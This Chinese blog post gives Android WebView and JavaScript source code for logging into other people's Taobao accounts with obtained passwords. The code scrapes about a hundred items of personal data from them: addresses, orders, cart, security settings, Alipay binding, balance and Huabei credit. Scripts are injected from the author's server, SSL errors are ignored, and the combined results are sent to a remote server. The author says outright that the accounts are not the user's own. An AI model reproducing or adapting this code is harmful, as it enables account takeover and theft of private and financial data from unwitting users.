安卓sdk webview获取淘宝个人信息100项,源码。
1、贴出主要代码。这个不是python,python只涉及了服务端对信息提取结果的接受。主体是java + android + js。由于淘宝各模块都是二级子域名,不能只在一个页面完成所有请求,ajax不能跨域。需要加载不同的页面。以下是主要部分。js内容使用服务端分发。
这样做好处,即使不使用微服务,单台机器也能满足1000个用户在同一分钟提交账号密码请求登录,简化后台编写复杂度和减小服务器压力。密码 验证码的校验也更及时。
2、不是爬自己的信息,是获取别人 任意账号 + 密码的淘宝个人信息,如果是为了拿到自己的信息,搞这么多七七八八的那是闲的蛋疼。具体账号 密码是哪来的,置顶第一篇有介绍。
package com.touna.crawlmodule; import android.graphics.Bitmap; import android.net.http.SslError; import android.support.v7.app.AppCompatActivity; import android.os.Bundle; import android.util.Log; import android.view.View; import android.webkit.CookieManager; import android.webkit.JavascriptInterface; import android.webkit.SslErrorHandler; import android.webkit.ValueCallback; import android.webkit.WebChromeClient; import android.webkit.WebSettings; import android.webkit.WebView; import android.webkit.WebViewClient; import org.json.JSONObject; import com.xx.httprequest.CrawlResultSender; import com.xx.view.LogUtil; import com.xx.view.ViewUtil; import com.xx.view.WebViewTimer; public class TaobaoActivity extends AppCompatActivity { private static final String TAG = "MainActivity"; private static final String LOGINPAGEURL = "https://login.m.taobao.com/login.htm";//移动端登陆页面 private static final String MOBILEINDEXPAGEURL = "http://h5.m.taobao.com/mlapp/mytaobao.html";//移动端淘宝个人用户首页 private static final String PCINDEXPAGEURL = "https://www.taobao.com/"; private static final String BINDPAGEURL = "http://member1.taobao.com/member/fresh/account_management.htm"; private static final String COLLECTIONURL = "https://shoucang.taobao.com/nodejs/item_collect_chunk.htm";//收藏页面url private static final String ADDRESSURL = "https://member1.taobao.com/member/fresh/deliver_address.htm";//收货地址url private static final String MYPATHURL = "https://lu.taobao.com/newMyPath.htm";//我的足迹url private static final String BOUGHTSHOPSURL = "https://favorite.taobao.com/list_bought_shops_n.htm";//已经购买的店铺 private static final String BOUGHTITEMSURL = "https://buyertrade.taobao.com/trade/itemlist/list_bought_items.htm";//已经购买的物品 private static final String SHOPCARTURL = "https://cart.taobao.com/cart.htm";//购物车URL private static final String SAFESETTINGURL = "http://member1.taobao.com/member/fresh/certify_info.htm";//安全信息设置 private static final String TRADEINFOURL = "http://member1.taobao.com/member/fresh/account_profile.htm";//交易信息url private static final String PERSONALINFOURL = "https://i.taobao.com/user/baseInfoSet.htm";//个人资料url private static final String POINTSURL = "https://pages.tmall.com/wow/jifen/act/point-details";//积分URL private static final String WEIBOURL = "http://member1.taobao.com/member/fresh/weibo_bind_management.htm";//绑定微博URL private static final String REFUSEURL = "https://refund2.tmall.com/dispute/buyerDisputeList.htm?type=1&disputeType=1";//退货管理URL private static final String HUABEIURL = "https://i.taobao.com/my_taobao.htm";//支付宝余额和花呗额度 private JSONObject dataJson=new JSONObject(); @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_taobo); startWebView(); } private void startWebView() { WebView webView = findViewById(R.id.taobaoView); final WebSettings settings = webView.getSettings(); settings.setUseWideViewPort(true); settings.setLayoutAlgorithm(WebSettings.LayoutAlgorithm.NARROW_COLUMNS); settings.setLoadWithOverviewMode(true); settings.setJavaScriptEnabled(true); webView.addJavascriptInterface(new JsInterface(), "JsInterface"); settings.setJavaScriptEnabled(true); settings.setLoadWithOverviewMode(true); settings.setSupportZoom(true); settings.setDomStorageEnabled(true); settings.setCacheMode(WebSettings.LOAD_NO_CACHE); settings.setAllowFileAccess(true); settings.setUseWideViewPort(true); settings.setSupportMultipleWindows(true); settings.setLoadsImagesAutomatically(true); //settings.setBlockNetworkImage(false); settings.setDefaultTextEncodingName("GBK"); webView.setVerticalScrollBarEnabled(true); webView.setHorizontalScrollBarEnabled(true); settings.setUserAgentString("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"); webView.setWebChromeClient(new WebChromeClient()); startWebViewClient(webView); webView.loadUrl(LOGINPAGEURL); } /** * @param view WebView对象 * 初始化webviewClient */ private void startWebViewClient(WebView view) { view.setWebViewClient(new WebViewClient() { @Override public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) { handler.proceed(); } @Override public void onPageStarted(final WebView view, String url, Bitmap favicon) { Log.e(TAG, "onPageStarted: " + url); if (url.contains(LOGINPAGEURL)){ view.setVisibility(View.GONE); } } /** * @param view 浏览器对象 * @param url 浏览器地址 */ @Override public void onPageFinished(final WebView view, String url) { Log.e(TAG, "onPageFinished: " + url); if (url.contains(LOGINPAGEURL)) { ViewUtil.injectScriptFile(view, "loginPage/taobaoInit.js"); view.loadUrl("javascript:initLoginPage()"); new WebViewTimer(view, 300){ @Override public void operateView(){ view.setVisibility(View.VISIBLE); } }; } if (url.contains(MOBILEINDEXPAGEURL)) { //view.getSettings().setUserAgentString("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"); ViewUtil.setNoImage(view); //关闭图片 view.loadUrl(PCINDEXPAGEURL); } if (PCINDEXPAGEURL.equals(url)) { view.loadUrl(REFUSEURL); } if (url.contains(REFUSEURL)) { ViewUtil.injectScriptFile(view, "jquery.min.js"); //此处需要jquery! ViewUtil.injectScriptFromInternet(view, "taobao/refund.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractRefund());"); view.loadUrl(POINTSURL); } if (url.contains(POINTSURL)) { Log.e(TAG, "onPageFinished: inject"); ViewUtil.injectScriptFromInternet(view, "taobao/point.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractPoint());"); view.loadUrl(PERSONALINFOURL); } if (url.contains(PERSONALINFOURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/personalInformation.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractPersonalInformation());"); view.loadUrl(COLLECTIONURL); } if (url.contains(COLLECTIONURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/collect.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractCollect());"); view.loadUrl(ADDRESSURL); } if (url.contains(ADDRESSURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/delivery.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractDelivery());"); view.loadUrl(MYPATHURL); } if (url.contains(MYPATHURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/footprint.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractFootprint());"); view.loadUrl(BOUGHTSHOPSURL); } if (url.contains(BOUGHTSHOPSURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/havaboughtStore.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractHaveBoughtStore());"); view.loadUrl(BOUGHTITEMSURL); } if (url.contains(BOUGHTITEMSURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/havebought.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractHaveBought());"); view.loadUrl(SHOPCARTURL); } if (url.contains(SHOPCARTURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/shoppingCart.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractShoppingCart());"); view.loadUrl(SAFESETTINGURL); } if (url.contains(SAFESETTINGURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/safeSettings.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractSafeSettings());"); view.loadUrl(TRADEINFOURL); } if (url.contains(TRADEINFOURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/tradeInfo.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractTradeInfo());"); view.loadUrl(WEIBOURL); } if (url.contains(WEIBOURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/weibo.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractWeibo());"); view.loadUrl(BINDPAGEURL); } if (url.contains(BINDPAGEURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/alipayBinding.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractAlipay());"); view.loadUrl(HUABEIURL); } if (url.contains(HUABEIURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/huabei.js"); view.loadUrl("javascript:clickHuabei1()"); new WebViewTimer(view, 2000){ @Override public void operateView(){ view.loadUrl("javascript:clickHuabei2()"); } }; new WebViewTimer(view, 4000){ @Override public void operateView(){ view.evaluateJavascript("extractHuabei()", new ValueCallback<String>() { @Override public void onReceiveValue(String s) { Log.e(TAG, "onReceiveValue: "+s ); String jsonStr = ViewUtil.getStrLikeJson(s); ViewUtil.reconsituteJSon(jsonStr, dataJson); ViewUtil.showLargeLog(dataJson.toString()); CrawlResultSender.sendToweb("taobao", dataJson.toString()); } }); } }; } } }); } class JsInterface { private static final String TAG = "JSInterface"; @JavascriptInterface public void getReturnString(String returnValue) throws Exception{ Log.e(TAG,"当前项返回值是: " + returnValue); ViewUtil.reconsituteJSon(returnValue,dataJson); } } }
贴出其中一个js实例,例如提取用户所收藏物品。这里不是用直接翻页,使用的是ajax以提升效率,ajax一定需要同步方式。由于此接口是返回的页面不是json,可以用css选择器。
1 /** 2 * Created by ㄟ(▔=▔)ㄏ on 2018/1/5. 3 */ 4 /* 5 * https://shoucang.taobao.com/nodejs/item_collect_chunk.htm?ifAllTag=0&tab=0&tagId=&categoryCount=0&type=0&tagName=&categoryName=&needNav=false&startRow=0 6 * 提取收藏的宝贝 7 * */ 8 function myajax(opt) { 9 opt = opt || {}; 10 opt.type = opt.type.toUpperCase() || 'POST'; 11 opt.url = opt.url || ''; 12 opt.async = opt.async || false; 13 opt.data = opt.data || null; 14 opt.success = opt.success || function () {}; 15 var xmlHttp = null; 16 if (XMLHttpRequest) { 17 xmlHttp = new XMLHttpRequest(); 18 } 19 else { 20 xmlHttp = new ActiveXObject('Microsoft.XMLHTTP'); 21 } 22 var params = []; 23 for (var key in opt.data){ 24 params.push(key + '=' + opt.data[key]); 25 } 26 var postData = params.join('&'); 27 if (opt.type.toUpperCase() === 'POST') { 28 xmlHttp.open(opt.type, opt.url, opt.async); 29 xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded;charset=utf-8'); 30 xmlHttp.send(postData); 31 } 32 else if (opt.type.toUpperCase() === 'GET') { 33 xmlHttp.open(opt.type, opt.url + '?' + postData, opt.async); 34 xmlHttp.send(null); 35 } 36 return xmlHttp; 37 } 38 39 40 function extractCollect() { 41 42 var collectList = []; 43 function extractCollectInner(p) { 44 console.debug("当前是第 " + p + "页"); 45 var p = p || 0; 46 var startRow = p*30 ; 47 var url = 'https://shoucang.taobao.com/nodejs/item_collect_chunk.htm?ifAllTag=0&tab=0&tagId=&categoryCount=0&type=0&tagName=&categoryName=&needNav=false&startRow='+ startRow; 48 var htmlObj = myajax({ 49 type: 'GET', 50 url: url , 51 async: false 52 }); 53 var htmlStr = htmlObj.responseText; 54 if (htmlStr.indexOf("J_FavListItem") > 0) { //判断页面是否为空不能继续翻页了 55 var collectSelectorList = document.querySelectorAll('li.J_FavListItem'); //使用原生js的querySelector css选择器方法 56 for (var i=0; i< collectSelectorList.length; i++) { 57 console.debug(i); 58 var collectName = collectSelectorList[i].querySelector('a.img-item-title-link').title; 59 var collectUrl = collectSelectorList[i].querySelector('a.img-item-title-link').href; 60 var collectPriceElement = collectSelectorList[i].querySelector('.g_price strong'); 61 collectPriceElement ? collectPrice = collectPriceElement.innerText : collectPrice = "宝贝已失效"; //三元运算符,找不到价格元素,说明该宝贝已失效 62 var collectObj = {'collectName': collectName, 'collectUrl': collectUrl,'collectPrice':collectPrice}; 63 console.info(collectObj); 64 collectList.push(collectObj); 65 } 66 console.info(url); 67 if (p < 3){ //最多只翻3页,每页30个收藏 68 extractCollectInner(p + 1); //翻页回调自己 69 } 70 } 71 return '{"collectInfo":' + JSON.stringify(collectList) + '}'; 72 } 73 74 return extractCollectInner(); 75 } 76 77 //extractCollect();
这就是唯一登录淘宝获取信息的方法,不管是什么语言java py,不管是用httpclient urlconnection还是urllib requests 想达到 本篇的目的,可能性为0。不服不信的可以用httpclient urllib试试,光是一个接口登录淘宝,网上就在悬赏5万人民币了,就不说提取信息了,单是把这个接口登录淘宝解决,相当于几个月的工资了。
反对极端面向过程编程思维方式,喜欢面向对象和设计模式的解读,喜欢对比极端面向过程编程和oop编程消耗代码代码行数的区别和原因。致力于使用oop和36种设计模式写出最高可复用的框架级代码和使用最少的代码行数完成任务,致力于使用oop和设计模式来使部分代码减少90%行,使绝大部分py文件最低减少50%-80%行的写法。